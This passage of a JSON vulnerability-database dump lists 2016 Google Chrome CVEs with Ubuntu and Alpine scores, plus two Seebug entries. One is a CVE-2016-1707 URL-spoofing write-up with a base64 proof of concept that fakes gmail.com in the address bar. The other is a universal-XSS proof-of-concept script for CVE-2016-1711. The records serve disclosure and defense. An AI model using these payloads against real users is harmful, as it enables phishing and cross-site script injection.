"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5127"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5127", "href": "https://ubuntu.com/security/CVE-2016-5127", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "Multiple unspecified vulnerabilities in Google Chrome before 52.0.2743.82\nallow attackers to cause a denial of service or possibly have other impact\nvia unknown vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1705", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1705", "href": "https://ubuntu.com/security/CVE-2016-1705", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:15", "description": "The CSPSource::schemeMatches function in\nWebKit/Source/core/frame/csp/CSPSource.cpp in the Content Security Policy\n(CSP) implementation in Blink, as used in Google Chrome before\n52.0.2743.82, does not apply http :80 policies to https :443 URLs and does\nnot apply ws :80 policies to wss :443 URLs, which makes it easier for\nremote attackers to determine whether a specific HSTS web site has been\nvisited by reading a CSP report. NOTE: this vulnerability is associated\nwith a specification change after CVE-2016-1617 resolution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5137", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1617", "CVE-2016-5137"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5137", "href": "https://ubuntu.com/security/CVE-2016-5137", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-04T14:16:15", "description": "net/proxy/proxy_service.cc in the Proxy Auto-Config (PAC) feature in Google\nChrome before 52.0.2743.82 does not ensure that URL information is\nrestricted to a scheme, host, and port, which allows remote attackers to\ndiscover credentials by operating a server with a PAC script, a related\nissue to CVE-2016-3763.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5134", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3763", "CVE-2016-5134"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5134", "href": "https://ubuntu.com/security/CVE-2016-5134", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T12:07:54", "description": "\u6765\u6e90\u94fe\u63a5\uff1a\r\n* http://xlab.tencent.com/cn/2016/10/11/CVE-2016-1707-Chrome-Address-Bar-URL-Spoofing-on-IOS/\r\n* \uff08\u82f1\u6587\u7248\uff09http://xisigr.com/x/cve-2016-1707/\r\n\r\n### 0x00 Vulnerability Overview\r\n\r\nChrome\u6d4f\u89c8\u5668\u5730\u5740\u680f\u6b3a\u9a97\u6f0f\u6d1e(CVE-2016-1707)\uff0c\u8fd9\u4e2a\u6f0f\u6d1e\u7b14\u8005\u4e8e2016\u5e746\u6708\u62a5\u544a\u7ed9Google\uff0c\u73b0\u5728\u628a\u6f0f\u6d1e\u7ec6\u8282\u5206\u4eab\u7ed9\u5927\u5bb6\u3002URL Spoofing\u6f0f\u6d1e\u53ef\u4ee5\u4f2a\u9020\u4e00\u4e2a\u5408\u6cd5\u7684\u7f51\u7ad9\u5730\u5740\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u5bf9\u7528\u6237\u53d1\u8d77\u7f51\u7edc\u9493\u9c7c\u653b\u51fb\u3002\r\n\r\n\u53d7\u5f71\u54cd\u7248\u672c\uff1aChrome < v52.0.2743.82\uff0cIOS < v10\r\n\r\n\r\n\r\n\r\n\r\n### 0x01 Vulnerability Details\r\n\r\nPOC:\r\n\r\n```\r\n<script>\r\n\r\npayload=\"PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=\";\r\n\r\nfunction pwned() {\r\n var t = window.open('https://www.gmail.com/', 'aaaa');\r\n t.document.write(atob(payload));\r\n t.document.write(\"<h1>Address bar says https://www.gmail.com/ - this is NOT https://www.gmail.com/</h1>\");\r\n}\r\n\r\n</script>\r\n\r\n<a href=\"https://hack.com::/\" target=\"aaaa\" onclick=\"setTimeout('pwned()','500')\">click me</a><br>\r\n```\r\n\r\n\u90a3\u4e48\u8fd9\u4e2a\u6f0f\u6d1e\u662f\u5982\u4f55\u53d1\u751f\u7684\u5462\uff1f\u7b14\u8005\u73b0\u5728\u6765\u89e3\u8bfb\u4e00\u4e0b\u6574\u4e2a\u4ee3\u7801\u7684\u52a0\u8f7d\u8fc7\u7a0b\u3002\u9996\u5148\u70b9\u51fbclick me\u8fd9\u4e2a\u94fe\u63a5\uff0c\u6d4f\u89c8\u5668\u53bb\u6253\u5f00\u4e00\u4e2aname\u4e3aaaaa\u7684\u65b0\u7a97\u53e3\uff0c\u8fd9\u4e2a\u9875\u9762\u53bb\u52a0\u8f7d`https://hack.com::`\uff0c\u8fd9\u4e2a\u5730\u5740\u53ef\u4ee5\u968f\u4fbf\u5199\u3002500\u5fae\u79d2\u540e\u8fd0\u884cpwned()\uff0c\u5728aaaa\u7a97\u53e3\u6253\u5f00`https://www.gmail.com`\uff0c\u5f53\u7136\u8fd9\u4e2aURL\u53ef\u4ee5\u4e3a\u7a7a\u3002\u5230\u73b0\u5728\u4e3a\u6b62\uff0c\u4e00\u5207\u4ee3\u7801\u8fd0\u884c\u90fd\u5f88\u6b63\u5e38\uff0c\u63a5\u4e0b\u6765\u8fd9\u6bb5\u4ee3\u7801\u5c31\u662f\u89e6\u53d1\u6f0f\u6d1e\u7684\u6838\u5fc3\u4ee3\u7801\u3002\r\n\r\nbase64\u52a0\u5bc6\u7684\u8fd9\u6bb5\u4ee3\u7801\uff1a\r\n\r\nbase64 payload code:\r\n\r\n```\r\n<body></body>\r\n \r\n<script>\r\n \r\n var link = document.createElement('a');\r\n \r\n link.href = 'https://gmail.com::';\r\n \r\n document.body.appendChild(link);\r\n \r\n link.click();\r\n \r\n</script>\r\n```\r\n\r\n\u63a5\u4e0b\u6765\u8fd9\u6bb5\u4ee3\u5f00\u59cb\u5728aaaa\u7a97\u53e3\u9875\u9762\u53bb\u63d0\u4ea4\uff08commit\uff09`https://gmail.com::`\uff0c\u8fd9\u662f\u4e00\u4e2a\u5f88\u5947\u5999\u7684\u4e8b\u60c5\uff0c`https://gmail.com::`\u672c\u662f\u4e00\u4e2a\u65e0\u6548\u7684\u5730\u5740\uff0c\u5982\u4f55\u53bb\u88ab\u63d0\u4ea4\u5462\u3002\u5728\u5c1d\u8bd5\u4e86\u591a\u79cd\u65b9\u6cd5\u540e\uff0c\u7b14\u8005\u53d1\u73b0\u4f7f\u7528a\u6807\u7b7e\u70b9\u51fb\u7684\u65b9\u5f0f\u53ef\u4ee5\u505a\u5230\uff08window.open/location\u5219\u4e0d\u53ef\u4ee5\uff09\uff0c\u5e76\u4e14\u4f7f\u8fd9\u4e2a\u65e0\u6548\u5730\u5740\u5904\u5728\u4e86\u4e00\u4e2a\u7b49\u5f85\u72b6\u6001(pending status)\u3002\u6b64\u65f6\uff0c\u5b9e\u9645Chrome\u662f\u52a0\u8f7d\u4e86about:blank\uff08\u5df2\u7ecf\u5230\u4e86`about:blank`\u57df\uff09\uff0c\u4f46\u5728\u5904\u7406\u6700\u540eURL\u5730\u5740\u680f\u4e2d\u7684\u663e\u793a\u65f6\uff0cChrome\u5374\u9009\u62e9\u4e86\u5904\u5728\u7b49\u5f85\u72b6\u6001\u7684`https://gmail.com::` \u4f5c\u4e3a\u6700\u540e\u7684\u63d0\u4ea4\u5730\u5740\uff0c\u52a0\u8f7d\u540e\u7684`https://gmail.com::`\u5728URL\u5730\u5740\u680f\u4e2d\u4f1a\u4ee5`https://gmail.com`\u8fd9\u6837\u7684\u65b9\u5f0f\u5448\u73b0\uff0c\u4e24\u4e2a::\u4f1a\u88ab\u9690\u85cf\u3002\u6b64\u65f6\uff0c\u6574\u4e2a\u52a0\u8f7d\u8fc7\u7a0b\u5b8c\u6210\u3002\u4e00\u4e2a\u5b8c\u7f8e\u7684URL Spoofing\u6f0f\u6d1e\u5c31\u8fd9\u6837\u4ea7\u751f\u4e86\u3002\r\n\r\nOnline demo:\r\n\r\nhttp://xisigr.com/test/spoof/chrome/1.html\r\n\r\nhttp://xisigr.com/test/spoof/chrome/2.html\r\n\r\n\u5982\u679c\u4f60\u8fd8\u6ca1\u6709\u5347\u7ea7\u7248\u672c\uff0cChrome < v52.0.2743.82\uff0cIOS < v10\uff0c\u90a3\u4e48\u53ef\u4ee5\u5c1d\u8bd5\u8fd0\u884c\u7b14\u8005\u7f51\u7ad9\u4e0a\u7684\u8fd9\u4e24\u4e2aDEMO\u3002\r\n\r\n### 0x02 \u5982\u4f55\u4fee\u590d\r\n\r\n\u8fd9\u4e2a\u6f0f\u6d1e\u6700\u5173\u952e\u7684\u5730\u65b9\u662f\uff0cChrome\u5141\u8bb8\u5728Web\u9875\u9762\u52a0\u8f7d\u7684\u65f6\u5019\uff0c\u63d0\u4ea4\u4e00\u4e2a\u65e0\u6548\u7684\u5730\u5740\u6240\u5bfc\u81f4\u3002Google\u4e5f\u662f\u57fa\u4e8e\u6b64\u7ed9\u51fa\u4e86\u8865\u4e01\u6587\u4ef6\uff0c\u5c31\u662f\u5728\u52a0\u8f7dWeb\u9875\u9762\u7684\u65f6\u5019\u4e0d\u5141\u8bb8\u63d0\u4ea4\u65e0\u6548\u5730\u5740\uff0c\u5982\u679c\u68c0\u6d4b\u5230\u662f\u65e0\u6548\u5730\u5740\uff0c\u5219\u76f4\u63a5\u4f7f\u5f53\u524dURL\u4e3aabout:blank\u3002\r\n```\r\n[self optOutScrollsToTopForSubviews];\r\n \r\n // Ensure the URL is as expected (and already reported to the delegate).\r\n \r\n- DCHECK(currentURL == _lastRegisteredRequestURL)\r\n \r\n+ // If |_lastRegisteredRequestURL| is invalid then |currentURL| will be\r\n \r\n+ // \"about:blank\".\r\n \r\n+ DCHECK((currentURL == _lastRegisteredRequestURL) ||\r\n \r\n+ (!_lastRegisteredRequestURL.is_valid() &&\r\n \r\n+ _documentURL.spec() == url::kAboutBlankURL))\r\n \r\n << std::endl\r\n \r\n << \"currentURL = [\" << currentURL << \"]\" << std::endl\r\n \r\n << \"_lastRegisteredRequestURL = [\" << _lastRegisteredRequestURL << \"]\";\r\n \r\n // This is the point where the document's URL has actually changed, and\r\n \r\n // pending navigation information should be applied to state information.\r\n \r\n [self setDocumentURL:net::GURLWithNSURL([_webView URL])];\r\n \r\n- DCHECK(_documentURL == _lastRegisteredRequestURL);\r\n \r\n+\r\n \r\n+ if (!_lastRegisteredRequestURL.is_valid() &&\r\n \r\n+ _documentURL != _lastRegisteredRequestURL) {\r\n \r\n+ // if |_lastRegisteredRequestURL| is an invalid URL, then |_documentURL|\r\n \r\n+ // will be \"about:blank\".\r\n \r\n+ [[self sessionController] updatePendingEntry:_documentURL];\r\n \r\n+ }\r\n \r\n+ DCHECK(_documentURL == _lastRegisteredRequestURL ||\r\n \r\n+ (!_lastRegisteredRequestURL.is_valid() &&\r\n \r\n+ _documentURL.spec() == url::kAboutBlankURL));\r\n \r\n+\r\n \r\n self.webStateImpl->OnNavigationCommitted(_documentURL);\r\n \r\n [self commitPendingNavigationInfo];\r\n \r\n if ([self currentBackForwardListItemHolder]->navigation_type() ==\r\n```\r\n\r\n### 0x03 \u62ab\u9732\u65f6\u95f4\r\n\r\n2016/6/22 \u62a5\u9001\u7ed9Google\uff0chttps://bugs.chromium.org/\r\n\r\n2016/6/22 Google\u786e\u8ba4\u6f0f\u6d1e\uff0c\u6f0f\u6d1e\u7ea7\u522bHigh\r\n\r\n2016/7/14 Google\u786e\u8ba4\u5956\u52b1$3000\r\n\r\n2016/7/20 Google\u53d1\u5e03\u5b89\u5168\u516c\u544a\uff0cCVE-2016-1707\r\n\r\n2016/10/2 Google\u516c\u5f00\u6f0f\u6d1e\r\n\r\n### 0x04 \u76f8\u5173\u94fe\u63a5\r\n\r\n\r\n[1] https://googlechromereleases.blogspot.com/2016/07/stable-channel-update.html\r\n\r\n[2] https://bugs.chromium.org/p/chromium/issues/detail?id=622183\r\n\r\n[3] https://chromium.googlesource.com/chromium/src/+/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5", "cvss3": {}, "published": "2016-10-11T00:00:00", "type": "seebug", "title": "Chrome Address Bar URL Spoofing on IOS", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1707"], "modified": "2016-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92469", "id": "SSV:92469", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T12:05:03", "description": "#### VULNERABILITY DETAILS\r\nFrameLoader::loadInSameDocument is vulnerable to a problem similar to the one described in issue 613266:\r\n\r\n```\r\nvoid FrameLoader::loadInSameDocument(const KURL& url, (...))\r\n{\r\n (...)\r\n // If we have a provisional request for a different document, a fragment scroll should cancel it.\r\n detachDocumentLoader(m_provisionalDocumentLoader);\r\n if (!m_frame->host())\r\n return;\r\n (...)\r\n}\r\n```\r\n\r\nCalling FrameLoader::startLoad in the middle of detaching |m_provisionalDocumentLoader| will cause the new provisional loader to be cleared prematurely. In this case, |m_provisionalDocumentLoader| isn't set up afterwards, so the attacker has to take care of it explicitly after the hash navigation in order to avoid crashes.\r\n\r\n#### VERSION\r\nChrome 51.0.2704.79 (Stable) \r\nChrome 52.0.2743.24 (Beta) \r\nChrome 53.0.2756.0 (Dev) \r\nChromium 53.0.2760.0 (Release build compiled today)", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "seebug", "title": "Chrome Universal XSS via same document navigations (CVE-2016-1711)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1711"], "modified": "2017-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93002", "id": "SSV:93002", "sourceData": "\n <script>\r\nvar i = document.documentElement.appendChild(document.createElement('iframe'));\r\nvar d = i.contentDocument.open();\r\nvar s = d.appendChild(d.createElement('iframe'));\r\n\r\nonload = function() {\r\n var a = d.createElement('a');\r\n a.href = 'data:text/xml,';\r\n a.click();\r\n}\r\n\r\ns.contentWindow.onunload = function() {\r\n stop();\r\n setTimeout(g, 1);\r\n}\r\n\r\nfunction g() {\r\n i.onload = function() {\r\n var x = d.createElement('form');\r\n x.action = 'javascript:alert(location)';\r\n x.submit();\r\n }\r\n i.src = 'https://abc.xyz';\r\n}\r\n\r\nfunction f() {\r\n var a = d.createElement('a');\r\n a.href = 'data:text/html,';\r\n a.click();\r\n d.close();\r\n a = d.createElement('a');\r\n a.href = '#';\r\n a.click();\r\n a = d.createElement('a');\r\n a.href = 'http://www.apple.com';\r\n a.click();\r\n}\r\n\r\nsetTimeout(f, 100);\r\n</script>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93002", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "alpinelinux": [{"lastseen": "2023-06-07T13:05:29", "description": "Google V8 before 5.2.361.32, as used in Google Chrome before 52.0.2743.82, does not properly process left-trimmed objects, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-07T13:04:02", "type": "alpinelinux", "title": "CVE-2016-5129", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129"], "modified": "2023-06-07T13:04:02", "id": "ALPINE:CVE-2016-5129", "href": "https://security.alpinelinux.org/vuln/CVE-2016-5129", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T13:05:07", "description": "Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-07T13:04:02", "type": "alpinelinux", "title": "CVE-2016-5131", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege&
Security update for Chromium (important)
